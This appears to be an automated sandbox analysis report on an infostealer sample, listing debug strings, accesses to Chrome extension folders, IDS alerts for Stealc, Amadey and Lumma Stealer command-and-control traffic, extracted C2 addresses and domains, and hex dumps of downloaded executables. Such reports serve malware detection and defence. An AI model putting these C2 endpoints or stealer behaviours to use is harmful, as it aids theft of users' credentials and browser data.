Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50064 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2032674785.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2032674785.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000003D.00000002.2935612132.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579730177.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000003D.00000000.2579616799.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2934811413.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000003D.00000002.2936107162.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2579771535.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49825 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49838
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49870 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:51372 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:57491 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:64560 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:62738 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:63719 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:56413 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.4:63369 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50011 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50015 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50021 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50028 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50039 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50040 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50041 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50043 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:64360 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:62669 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:55775 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:57650 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:52540 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:61073 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50044 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50047 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50049 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50046 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50042 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50050 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50053 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50054 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50048 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50055 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:51085 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:58588 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:57240 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:58526 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:52958 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:65014 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50056 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50057 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50058 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50059 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50061 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50063 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50060 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.4:50064 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50065 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50011 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50011 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50049 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50021 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50021 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50039 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50061 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50061 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50059 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50056 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50056 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50046 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50046 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50047 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50047 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 00:14:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 00:14:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
